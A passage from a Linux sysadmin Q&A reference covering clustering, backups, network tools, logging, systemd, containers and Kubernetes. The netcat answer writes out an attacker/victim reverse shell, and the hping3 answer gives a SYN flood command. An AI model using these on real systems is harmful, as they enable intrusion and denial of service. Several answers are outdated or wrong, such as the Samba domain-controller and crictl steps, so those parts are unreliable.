192.168.1.100 dev eth0 label eth0:vip
}
}
# BACKUP config
# priority 90
# Enable service
systemctl enable keepalived
systemctl start keepalived

Q172: How do you configure Pacemaker/Corosync?

Section titled “Q172: How do you configure Pacemaker/Corosync?”

Answer:

Terminal window
# Install
apt install pacemaker corosync pcs
# Authenticate nodes
pcs host auth node1 node2
# Create cluster
pcs cluster setup mycluster node1 node2
# Start cluster
pcs cluster start --all
# Add resource
pcs resource create VIP ocf:heartbeat:IPaddr2 \
ip=192.168.1.100 cidr_netmask=24 op monitor interval=30s
# Configure failover
pcs constraint location VIP rule score=200 \
pingd 100
# View status
pcs status

Answer:

/etc/drbd.d/global_common.conf
# Install
apt install drbd-utils
global {
usage-count yes;
}
common {
protocol C;
handlers {
pri-on-incon-degr "/usr/lib/drbd/notify-pri-on-incon-degr.sh; /usr/lib/drbd/notify-emergency-reboot.sh; echo b > /proc/sysrq-trigger ; reboot -f";
}
net {
cram-hmac-alg sha1;
shared-secret "mysecret";
}
}
# /etc/drbd.d/r0.res
resource r0 {
on node1 {
device /dev/drbd0;
disk /dev/sdb1;
address 192.168.1.10:7789;
meta-disk internal;
}
on node2 {
device /dev/drbd0;
disk /dev/sdb1;
address 192.168.1.11:7789;
meta-disk internal;
}
}
# Initialize
drbdadm create-md r0
drbdadm up r0
drbdadm primary --force r0
# Filesystem
mkfs.ext4 /dev/drbd0

Answer:

Terminal window
# Install
apt install glusterfs-server
# Add peers
gluster peer probe node2
# Create volume
gluster volume create gv0 \
replica 2 \
node1:/brick1/gv0 \
node2:/brick1/gv0
# Start volume
gluster volume start gv0
# Mount
mount -t glusterfs node1:/gv0 /mnt
# Volume info
gluster volume info
gluster volume status

Answer:

Terminal window
# Install
apt install ceph-mon ceph-osd ceph-mgr ceph-mds
# Create monitor
ceph-mon --mkfs -i node1 --keyring /tmp/ceph.mon.keyring
systemctl start ceph-mon@node1
# Create OSD
ceph-disk prepare --data /dev/sdb
ceph-disk activate /dev/sdb1
# Create pool
ceph osd pool create mypool 100
# Mount
mount -t ceph node1:/ /mnt/ceph

Answer:

Terminal window
# Basic sync
rsync -avz /source/ /destination/
# With deletion
rsync -avz --delete /source/ /destination/
# Exclude patterns
rsync -avz --exclude='*.log' --exclude='tmp/' /source/ /destination/
# Compress during transfer
rsync -avz --compress /source/ /destination/
# Dry run
rsync -avzn /source/ /destination/
# With progress
rsync -avz --progress /source/ /destination/
# Backup script
#!/bin/bash
rsync -avz --delete --exclude-from='/etc/rsync-exclude.txt' \
/data/ /backup/data-$(date +%Y%m%d)/
find /backup -type d -mtime +30 -exec rm -rf {} \;

Answer:

Terminal window
# Install
apt install amanda-server amanda-client
# Configure /etc/amanda/DailySet1/amanda.conf
org "DailySet1"
mailto "admin@example.com"
dumpuser "backup"
inparallel 4
netusage 10000
tapetype "HARDDISK"
define tapetype HARDDISK {
length 10000 mb
}
define storage {
name "hd-storage"
plugin "file"
device "/backup/amanda"
}
define dumptype {
global
comment "Default dump"
compress client fast
index yes
}
# Add holding disk
holdingdisk hd1 {
comment "Main holding disk"
directory "/dumps"
use 2000 mb
chunksize 1 mb
}

Answer:

Terminal window
# Install
apt install bacula-server bacula-client
# Configure director
# /etc/bacula/bacula-dir.conf
Director {
Name = bacula-dir
DIRport = 9101
QueryFile = "/etc/bacula/query.sql"
WorkingDirectory = "/var/lib/bacula"
PidDirectory = "/var/run/bacula"
Maximum Concurrent Jobs = 10
}
# Configure client
# /etc/bacula/bacula-fd.conf
FileDaemon {
Name = bacula-fd
FDport = 9102
WorkingDirectory = /var/lib/bacula
PidDirectory = /var/run/bacula
}
# Backup job
Job {
Name = "BackupClient1"
JobDefs = "DefaultJob"
Client = client1-fd
FileSet = "Full Set"
}

Answer:

Terminal window
# Install
apt install restic
# Initialize repository
restic init --repo /backup
# Or S3
AWS_ACCESS_KEY_ID=xxx AWS_SECRET_ACCESS_KEY=xxx \
restic -r s3:s3.amazonaws.com/bucket init
# Backup
restic -r /backup backup /data
# List snapshots
restic -r /backup snapshots
# Mount
restic -r /backup mount /mnt/restic
# Restore
restic -r /backup restore latest --target /restore
# Check integrity
restic -r /backup check

Answer:

Terminal window
# Install
apt install borgmatic
apt install borgbackup
# Initialize
borg init --encryption=repokey /backup
# Create config /etc/borgmatic/config.yaml
source_directories:
- /home
- /etc
repositories:
- /backup
retention:
keep_daily: 7
keep_weekly: 4
keep_monthly: 6
# Backup
borgmatic -v 1
# List
borg list /backup
# Mount
borg mount /backup::backup-2023-01-01 /mnt/backup
# Extract
borg extract /backup::backup-2023-01-01

Answer:

Terminal window
# Install
apt install nmap
# Basic scan
nmap 192.168.1.1
# Scan types
nmap -sS 192.168.1.1 # SYN scan
nmap -sT 192.168.1.1 # TCP connect
nmap -sU 192.168.1.1 # UDP scan
nmap -sV 192.168.1.1 # Version detection
# OS detection
nmap -O 192.168.1.1
# Scripts
nmap -sC 192.168.1.1 # Default scripts
nmap --script=vuln 192.168.1.1
# Output
nmap -oA output 192.168.1.1 # All formats
nmap -oN output.nmap 192.168.1.1

Answer:

Terminal window
# Install
apt install wireshark tshark
# Capture with tshark
tshark -i eth0 -w capture.pcap
tshark -i eth0 -f "tcp port 80" -w http.pcap
# Read pcap
tshark -r capture.pcap
tshark -r capture.pcap -Y "http.request" # Filter
# Extract HTTP
tshark -r capture.pcap -z "http,tree"
# Remote capture
ssh user@host "tcpdump -i eth0 -w -" | wireshark -k -i -

Answer:

Terminal window
# Port scanning
nc -zv 192.168.1.1 1-1000
# Simple server
nc -l -p 1234
# Simple client
nc 192.168.1.1 1234
# File transfer
# Server
nc -l -p 1234 < file.txt
# Client
nc 192.168.1.1 1234 > file.txt
# Reverse shell
# Server (attacker)
nc -l -p 1234
# Client (victim)
nc -e /bin/bash 192.168.1.1 1234
# Chat
nc -l -p 1234
nc 192.168.1.1 1234

Answer:

Terminal window
# Install
apt install hping3
# Ping
hping3 -1 192.168.1.1
# SYN flood
hping3 -S 192.168.1.1 -p 80 --flood
# Port scan
hping3 -8 1-1000 -S 192.168.1.1
# Trace
hping3 -t 1 -z 192.168.1.1
# Custom packet
hping3 -c 1 -1 -p 80 -E data.txt 192.168.1.1

Answer:

Terminal window
# Capture packets
tcpdump -i eth0
# Filter by host
tcpdump host 192.168.1.1
# Filter by port
tcpdump port 80
tcpdump src port 443
# Filter by protocol
tcpdump icmp
tcpdump tcp
tcpdump udp
# Write to file
tcpdump -w capture.pcap
# Read from file
tcpdump -r capture.pcap
tcpdump -r capture.pcap | grep "pattern"
# Advanced filters
tcpdump 'tcp[tcpflags] & (tcp-syn|tcp-fin) != 0'
tcpdump -i eth0 'port 80 and host 192.168.1.1'

Answer:

/etc/rsyslog.conf
# Load modules
module(load="imudp")
module(load="imtcp")
# Input
input(type="imudp" port="514")
input(type="imtcp" port="514")
# Remote logging
*.* @@remote-host:514
# Filter
:programname, isequal, "nginx" /var/log/nginx.log
& stop
# Templates
$template RemoteLogs,"/var/log/%HOSTNAME%/%programname%.log"
*.* ?RemoteLogs
# Queue
$ActionQueueType LinkedList
$ActionQueueFileName remote-fwd
$ActionResumeRetryCount 3
$ActionQueueSaveOnShutdown on

Answer:

Terminal window
# Install Graylog
# Using OVA or AMI
# Configure inputs
# Web UI -> System -> Inputs -> GELF UDP
# Configure sidecar
apt install graylog-sidecar
graylog-sidecar -c /etc/graylog/sidecar/sidecar.yml
# Filebeat configuration
filebeat.inputs:
- type: log
paths:
- /var/log/syslog
fields:
type: syslog
fields_under_root: true

Answer:

/etc/logrotate.d/nginx
/var/log/nginx/*.log {
daily
missingok
rotate 14
compress
delaycompress
notifempty
create 0640 www-data adm
sharedscripts
postrotate
[ -f /var/run/nginx.pid ] && kill -USR1 `cat /var/run/nginx.pid`
endscript
}
# Manual run
logrotate -f /etc/logrotate.conf
logrotate -d /etc/logrotate.conf # debug

Answer:

Terminal window
# Install Elasticsearch
docker run -d -p 9200:9200 elasticsearch:7
# Install Kibana
docker run -d -p 5601:5601 kibana:7
# Install Logstash
docker run -d -p 5044:5044 logstash:7 -f /etc/logstash/conf.d/
# Filebeat configuration
filebeat.inputs:
- type: log
paths:
- /var/log/*.log
output.logstash:
hosts: ["localhost:5044"]
# Ingest pipeline
input {
beats {
port => 5044
}
}
filter {
grok {
match => { "message" => "%{COMBINEDAPACHELOG}" }
}
}
output {
elasticsearch {
hosts => ["localhost:9200"]
}
}

Answer:

Terminal window
# Install
dpkg -i splunkforwarder-latest.deb
# Start
/opt/splunkforwarder/bin/splunk start --accept-license
# Configure inputs
cat /opt/splunkforwarder/etc/system/local/inputs.conf
[monitor:///var/log/syslog]
sourcetype = syslog
# Configure outputs
cat /opt/splunkforwarder/etc/system/local/outputs.conf
[tcpout:default-autolb-group]
server = splunk-server:9997
# Enable boot start
/opt/splunkforwarder/bin/splunk enable boot-start

Answer:

/etc/systemd/system/myservice.service
[Unit]
Description=My Service
After=network.target
[Service]
Type=simple
User=myuser
Group=mygroup
WorkingDirectory=/opt/myapp
ExecStart=/opt/myapp/bin/start
ExecStop=/opt/myapp/bin/stop
ExecReload=/bin/kill -HUP $MAINPID
Restart=on-failure
RestartSec=10
StandardOutput=journal
StandardError=journal
[Install]
WantedBy=multi-user.target

Answer:

/etc/systemd/system/mytimer.timer
[Unit]
Description=Run daily backup
[Timer]
OnCalendar=daily
Persistent=true
RandomizedDelaySec=1h
[Install]
WantedBy=timers.target
# /etc/systemd/system/mytimer.service
[Unit]
Description=Daily backup job
[Service]
Type=oneshot
ExecStart=/usr/local/bin/backup.sh

Answer:

/etc/tmpfiles.d/mydirs.conf
# Create directories with specific permissions
d /var/run/myservice 0755 myuser mygroup -
L /var/run/myservice/link - - - - /var/myservice
# Runtime
systemd-tmpfiles --create
systemd-tmpfiles --clean
# At boot
systemctl enable systemd-tmpfiles-clean.timer

Answer:

Terminal window
# Check status
systemctl status myservice
journalctl -u myservice
# Follow logs
journalctl -fu myservice
# Debug mode
systemctl edit myservice
# Add:
# [Service]
# Environment=SYSTEMD_LOG_LEVEL=debug
# Check dependencies
systemctl list-dependencies myservice
# Check failed
systemctl --failed
systemctl reset-failed

Answer:

/etc/systemd/system/myservice.service
[Service]
MemoryMax=1G
MemoryHigh=512M
CPUQuota=50%
IOReadBandwidthMax=/dev/sda 1M
IOWriteBandwidthMax=/dev/sda 1M
TasksMax=100
# Apply
systemctl daemon-reload
systemctl restart myservice

Q196: How do you create custom Docker images?

Section titled “Q196: How do you create custom Docker images?”

Answer:

# Dockerfile
FROM ubuntu:20.04
# Labels
LABEL maintainer="admin@example.com"
LABEL version="1.0"
# Environment
ENV APP_HOME=/opt/app
ENV NODE_ENV=production
# Install dependencies
RUN apt-get update && \
apt-get install -y curl nginx && \
apt-get clean && \
rm -rf /var/lib/apt/lists/*
# Create user
RUN useradd -m -s /bin/bash appuser
# Copy files
COPY --chown=appuser:appuser . /opt/app
# Switch user
USER appuser
# Expose
EXPOSE 80 443
# Health check
HEALTHCHECK --interval=30s --timeout=3s \
CMD curl -f http://localhost/ || exit 1
# Entrypoint
ENTRYPOINT ["/opt/app/start.sh"]
CMD ["nginx", "-g", "daemon off;"]

Answer:

# Use Alpine
FROM node:18-alpine
# Use multi-stage build
FROM node:18-alpine AS builder
WORKDIR /build
COPY package*.json ./
RUN npm ci --only=production
FROM node:18-alpine
WORKDIR /app
COPY --from=builder /build/node_modules ./node_modules
COPY . .
USER node
# Combine layers (Alpine images use apk, not apt-get)
RUN apk add --no-cache curl
# Use .dockerignore
# node_modules
# .git
# *.log

Q198: How do you configure Docker networking?

Section titled “Q198: How do you configure Docker networking?”

Answer:

Terminal window
# Create network
docker network create mynetwork
# Run with network
docker run -d --network mynetwork --name web nginx
# Bridge network
docker network create --driver bridge mybridge
# Host network
docker run --network host nginx
# Overlay (Swarm)
docker network create --driver overlay myoverlay
# DNS resolution
docker run -d --network mynetwork --dns 8.8.8.8 nginx

Q199: How do you use Docker Compose for orchestration?

Section titled “Q199: How do you use Docker Compose for orchestration?”

Answer:

version: '3.8'
services:
web:
image: nginx:alpine
ports:
- "80:80"
networks:
- frontend
depends_on:
- app
healthcheck:
test: ["CMD", "curl", "-f", "http://localhost/"]
interval: 30s
timeout: 10s
retries: 3
app:
build: .
networks:
- frontend
- backend
environment:
- DATABASE_URL=postgres://db:5432/myapp
db:
image: postgres:14
volumes:
- db-data:/var/lib/postgresql/data
networks:
- backend
networks:
frontend:
backend:
volumes:
db-data:

Q200: How do you secure Docker containers?

Section titled “Q200: How do you secure Docker containers?”

Answer:

Terminal window
# Run as non-root
docker run -u 1000:1000 nginx
# Read-only root filesystem
docker run --read-only nginx
# Limit capabilities
docker run --cap-drop ALL --cap-add NET_BIND_SERVICE nginx
# Seccomp profile
docker run --security-opt seccomp=/path/to/profile.json nginx
# AppArmor profile
docker run --security-opt apparmor=docker-default nginx
# No new privileges
docker run --security-opt no-new-privileges:true nginx
# Scan images
docker scan nginx
# Use rootless Docker
dockerd-rootless.sh

Q201: How do you configure systemd network namespace?

Section titled “Q201: How do you configure systemd network namespace?”
Terminal window
ip netns add myns
ip netns exec myns ip link
ip netns exec myns ping 8.8.8.8
# List
ip netns list
# Delete
ip netns delete myns

Q202: How do you use Linux traffic control?

Section titled “Q202: How do you use Linux traffic control?”
Terminal window
# Add qdisc
tc qdisc add dev eth0 root netem delay 100ms
# Rate limiting
tc qdisc add dev eth0 root tbf rate 1mbit burst 1540 latency 50ms
# View
tc qdisc show
tc -s qdisc show
Terminal window
# Install bpftrace
apt install bpftrace
# Simple trace
bpftrace -e 'tracepoint:syscalls:sys_enter_openat { printf("%s\n", comm); }'
bpftrace /path/to/program.bt
# Using bpfcc
apt install bpfcc-tools
execsnoop-bpfcc
opensnoop-bpfcc
tcpconnect-bpfcc
Terminal window
# Install
apt install auditd
# Add rules
auditctl -w /etc/passwd -p wa -k passwd_change
auditctl -w /var/www/html -p r -k web_access
# List rules
auditctl -l
# Search
ausearch -k passwd_change
aureport -f
Terminal window
# Install
apt install ufw
# Enable
ufw enable
ufw default deny incoming
ufw default allow outgoing
# Rules
ufw allow ssh
ufw allow 80/tcp
ufw allow from 192.168.1.0/24 to any port 5432
# Status
ufw status numbered
ufw delete 1
# Logging
ufw logging on
ufw logging low
Terminal window
# Install
apt install firewalld
# Services
firewall-cmd --list-services
firewall-cmd --add-service=http
firewall-cmd --add-port=8080/tcp
# Zones
firewall-cmd --get-zones
firewall-cmd --zone=public --list-all
# Permanent
firewall-cmd --runtime-to-permanent
# Rich rules
firewall-cmd --add-rich-rule='rule family="ipv4" source address="192.168.1.0/24" accept'

Answer:

Terminal window
# Install
apt install openvpn easy-rsa
# Setup CA
cd /usr/share/easy-rsa
./easyrsa init-pki
./easyrsa build-ca
# Build server
./easyrsa build-server-full server nopass
# Build client
./easyrsa build-client-full client1 nopass
# Server config
cp pki/ca.crt /etc/openvpn/
cp pki/issued/server.crt /etc/openvpn/
cp pki/private/server.key /etc/openvpn/
# Client config
client
dev tun
remote vpn.example.com 1194
proto udp
ca ca.crt
cert client1.crt
key client1.key

Answer:

Terminal window
# Install
apt install wireguard
# Generate keys
wg genkey | tee private.key | wg pubkey > public.key
# Server config /etc/wireguard/wg0.conf
[Interface]
Address = 10.0.0.1/24
ListenPort = 51820
PrivateKey = <server-private-key>
[Peer]
PublicKey = <client-public-key>
AllowedIPs = 10.0.0.2/32
# Client config
[Interface]
Address = 10.0.0.2/24
PrivateKey = <client-private-key>
[Peer]
PublicKey = <server-public-key>
Endpoint = vpn.example.com:51820
AllowedIPs = 0.0.0.0/0
PersistentKeepalive = 25

Answer:

Terminal window
# Generate key
gpg --full-generate-key
# Encrypt
gpg -e -r recipient@example.com file.txt
# Decrypt
gpg -d file.txt.gpg
# Sign
gpg -s file.txt
# Verify
gpg --verify file.txt.asc
# List keys
gpg --list-keys
gpg --list-secret-keys
# Export/Import
gpg --export -a > public.key
gpg --import public.key

Answer:

Terminal window
# Generate private key
openssl genrsa -out private.key 2048
# Generate CSR
openssl req -new -key private.key -out request.csr
# Self-signed certificate
openssl req -x509 -days 365 -key private.key -in request.csr -out certificate.crt
# View certificate
openssl x509 -in certificate.crt -text -noout
# Verify
openssl verify -CAfile ca.crt certificate.crt
# Convert formats
openssl x509 -in cert.pem -outform DER -out cert.der

Answer:

Terminal window
# Install
apt install slapd ldap-utils
# Configure
dpkg-reconfigure slapd
# Add entries
ldapadd -x -D "cn=admin,dc=example,dc=com" -W -f entries.ldif
# Search
ldapsearch -x -b "dc=example,dc=com" "(objectclass=*)"
# Modify
ldapmodify -x -D "cn=admin,dc=example,dc=com" -W -f modify.ldif
# Delete
ldapdelete -x -D "cn=admin,dc=example,dc=com" "uid=user,ou=people,dc=example,dc=com"

Q212: How do you configure Postfix with LDAP?

Section titled “Q212: How do you configure Postfix with LDAP?”

Answer:

/etc/postfix/ldap/virtual_alias_maps.cf
# Install
apt install postfix-ldap
server_host = ldap.example.com
search_base = ou=people,dc=example,dc=com
query_filter = mail=%s
result_attribute = mailForwardingAddress

Q213: How do you configure Samba as domain controller?

Section titled “Q213: How do you configure Samba as domain controller?”

Answer:

Terminal window
# Install
apt install samba krb5-user
# Provision
samba-tool domain provision --realm=EXAMPLE.COM --domain=EXAMPLE --adminpass=Password123 --server-role=dc
# Start (an AD domain controller runs the samba-ad-dc unit, not smbd/samba)
systemctl unmask samba-ad-dc
systemctl start samba-ad-dc
# Add user
useradd -M -s /sbin/nologin administrator
smbpasswd -a administrator
# Join domain
net ads join -U administrator

Answer:

Terminal window
# Server /etc/exports
/exports *(rw,sec=sys,fsid=0,no_subtree_check,no_root_squash)
# Client
mount -t nfs4 server:/ /mnt/nfs
# Or with Kerberos
# Server
/exports *(rw,sec=krb5p,fsid=0)
# Client
mount -t nfs4 -o sec=krb5 server:/ /mnt/nfs

Answer:

Terminal window
# Create encrypted container
dd if=/dev/zero of=/container bs=1M count=1000
cryptsetup luksFormat /container
# Open
cryptsetup open /container cryptvol
# Format
mkfs.ext4 /dev/mapper/cryptvol
# Mount
mount /dev/mapper/cryptvol /mnt
# Close
umount /mnt
cryptsetup close cryptvol

Q216: How do you configure systemd network targets?

Section titled “Q216: How do you configure systemd network targets?”

Answer:

# /etc/systemd/system/myapp.target
[Unit]
Description=My Application Target
Requires=network-online.target
After=network-online.target

[Install]
WantedBy=multi-user.target

### Q217: How do you use cgroups v2?
```bash
# Check cgroup version
stat -fc %T /sys/fs/cgroup/
# Create group
mkdir -p /sys/fs/cgroup/mygroup
echo 100000000 > /sys/fs/cgroup/mygroup/cpu.max
# Add process
echo PID > /sys/fs/cgroup/mygroup/cgroup.procs

Q218: How do you configure namespace isolation?

Section titled “Q218: How do you configure namespace isolation?”
Terminal window
# Create network namespace
ip netns add myns
# Create user namespace
unshare --user
# Create PID namespace
unshare --pid --fork --mount-proc
# Mount namespace
unshare --mount

Q219: How do you use Linux capabilities?

Terminal window
# Check capabilities
getcap -r /usr/bin
# Add capability
setcap cap_net_raw+ep /usr/bin/ping
# Check specific
getcap /usr/bin/ping
# Remove
setcap -r /usr/bin/ping

Answer:

Terminal window
# Default profile
docker run --rm -it hello-world # the default seccomp profile is applied automatically
# Custom profile
cat /etc/docker/seccomp.json
{
"defaultAction": "SCMP_ACT_ERRNO",
"architectures": ["SCMP_ARCH_X86_64"],
"syscalls": []
}
docker run --security-opt seccomp=/etc/docker/seccomp.json nginx

Answer:

Terminal window
# Install
apt install linux-tools-common linux-tools-generic
# CPU sampling
perf record -g ./myprogram
perf report
# Specific events
perf stat -e cycles,instructions ./myprogram
# Top
perf top
# Scheduler analysis
perf sched latency

Answer:

Terminal window
# Basic
strace -p PID
strace -c command
# Output to file
strace -o output.txt command
# Timestamps
strace -t command
strace -tt command
# Filter
strace -e trace=network,file command
strace -e openat,write command

Answer:

Terminal window
# Basic
ltrace -p PID
ltrace -c command
# Library calls
ltrace -l library.so command
# Time
ltrace -T command
# Follow forks
ltrace -f command

Answer:

Terminal window
# Basic
vmstat 1
# Memory
vmstat -m
# Disk
vmstat -d
# Summary
vmstat -s
# Wide output
vmstat -w

Answer:

Terminal window
# Basic
iotop
# Only I/O
iotop -o
# Batch mode
iotop -b -n 3
# Only processes
iotop -P
# By thread
iotop -t

Answer:

Terminal window
# CPU
sar -u 1 5
# Memory
sar -r 1 5
# Swap
sar -S 1 5
# I/O
sar -b 1 5
# Network
sar -n DEV 1 5
# All
sar -A

Answer:

/etc/security/limits.conf
* soft nofile 65535
* hard nofile 65535
* soft nproc 4096
* hard nproc 8192
root soft nofile unlimited
# Apply without logout
ulimit -n 65535

Q228: How do you tune TCP stack for high performance?

Section titled “Q228: How do you tune TCP stack for high performance?”

Answer:

/etc/sysctl.conf
net.core.somaxconn = 65535
net.ipv4.tcp_max_syn_backlog = 65535
net.ipv4.ip_local_port_range = 1024 65535
net.ipv4.tcp_fin_timeout = 15
net.ipv4.tcp_max_tw_buckets = 2000000
net.ipv4.tcp_tw_reuse = 1
net.ipv4.tcp_keepalive_time = 300
net.ipv4.tcp_keepalive_intvl = 15
net.ipv4.tcp_keepalive_probes = 5
net.core.rmem_max = 16777216
net.core.wmem_max = 16777216
net.ipv4.tcp_rmem = 4096 87380 16777216
net.ipv4.tcp_wmem = 4096 65536 16777216

Q229: How do you optimize disk I/O scheduler?

Section titled “Q229: How do you optimize disk I/O scheduler?”

Answer:

Terminal window
# For SSD/NVMe ("none" on modern blk-mq kernels; "noop" was the legacy name)
echo none > /sys/block/sda/queue/scheduler
# For HDD (mq-deadline or bfq)
echo mq-deadline > /sys/block/sda/queue/scheduler
# Make persistent
# /etc/udev/rules.d/60-ioschedulers.rules
ACTION=="add|change", KERNEL=="sd[a-z]", ATTR{queue/scheduler}="mq-deadline"

Answer:

Terminal window
# Check available
cat /sys/devices/system/cpu/cpu0/cpufreq/scaling_available_governors
# Set for all
for cpu in /sys/devices/system/cpu/cpu*/cpufreq/scaling_governor; do
echo performance > $cpu
done
# Install cpufrequtils
apt install cpufrequtils
# /etc/default/cpufrequtils
GOVERNOR="performance"
# With systemd
systemctl enable cpufreqd

Answer:

Terminal window
# Configure crictl
cat > /etc/crictl.yaml <<EOF
runtime-endpoint: unix:///var/run/dockershim.sock
image-endpoint: unix:///var/run/dockershim.sock
timeout: 10
debug: false
EOF
# Pull image
crictl pull nginx:latest
# Run container
crictl run container.json pod.json
# List
crictl ps
crictl pods

Answer:

Terminal window
# Rootless containers
podman run -d nginx
podman ps
podman logs -f container
# Build image
podman build -t myimage .
podman push myimage registry.example.com/myimage
# Systemd service
podman generate systemd --name myapp > myapp.service
systemctl enable --user myapp

Answer:

Terminal window
# Install containerd
apt install containerd
# Configure /etc/containerd/config.toml
[plugins]
[plugins."io.containerd.grpc.v1.cri"]
sandbox_image = "registry.k8s.io/pause:3.9"
[plugins."io.containerd.grpc.v1.cri".containerd.runtimes.runc]
runtime_type = "io.containerd.runtime.v1.linux"
runtime_engine = ""
runtime_root = ""

Answer:

Terminal window
# Build from Dockerfile
buildah bud -t myimage .
# Build without Dockerfile
buildah from alpine
buildah run alpine -- apk add nginx
buildah commit alpine myimage
# Use multiple containers
buildah bud --layers -t myapp
# Push to registry
buildah push myimage

Answer:

Terminal window
# Inspect remote image
skopeo inspect docker://nginx:latest
# Copy between registries
skopeo copy docker://source/nginx:latest docker://dest/nginx:latest
# List tags
skopeo list-tags docker://registry.example.com/myimage
# Delete
skopeo delete docker://registry.example.com/myimage:tag

Answer:

Terminal window
# Install
wget https://github.com/Mirantis/cri-dockerd/releases/latest/download/cri-dockerd-amd64
install -o root -g root -m 0755 cri-dockerd-amd64 /usr/local/bin/cri-dockerd
# Run with systemd
# /etc/systemd/system/cri-docker.service
[Unit]
Description=CRI-Docker
After=network-online.target firewalld.service docker.service
Requires=docker.service
[Service]
ExecStart=/usr/local/bin/cri-dockerd --network-plugin=cni --pod-infra-container-image=pause:3.9

Answer:

Terminal window
# Install
curl -sfL https://get.k3s.io | INSTALL_K3S_EXEC="--write-kubeconfig-mode 644" sh -
# Or with Docker
docker run -d --privileged -p 8080:6443 -v /var/lib/rancher/k3s:/var/lib/rancher/k3s rancher/k3s:latest server
# Agent
curl -sfL https://get.k3s.io | K3S_URL=https://server:6443 K3S_TOKEN=TOKEN sh -

Answer:

Terminal window
# Configure
mkdir ~/.kube
cp /etc/rancher/k3s/k3s.yaml ~/.kube/config
chmod 600 ~/.kube/config
# Commands
kubectl get nodes
kubectl get pods -A
kubectl get services
kubectl get deployments
# Apply
kubectl apply -f deployment.yaml
# Debug
kubectl describe pod name
kubectl logs -f pod/name
kubectl exec -it pod/name -- /bin/bash

Answer:

Terminal window
# Install
curl https://raw.githubusercontent.com/helm/helm/main/scripts/get-helm-3 | bash
# Add repo
helm repo add stable https://charts.helm.sh/stable
helm repo update
# Install
helm install myrelease stable/nginx
# Upgrade
helm upgrade myrelease stable/nginx
# Template
helm template myrelease stable/nginx
# Values
helm install -f values.yaml myrelease stable/nginx

Answer:

kustomization.yaml
apiVersion: kustomize.config.k8s.io/v1beta1
kind: Kustomization
resources:
- deployment.yaml
- service.yaml
namespace: production
commonLabels:
app: myapp
configMapGenerator:
- name: app-config
literals:
- DEBUG=false
replicas:
- name: deployment
count: 3

Continue with questions 241-1000 covering more advanced topics…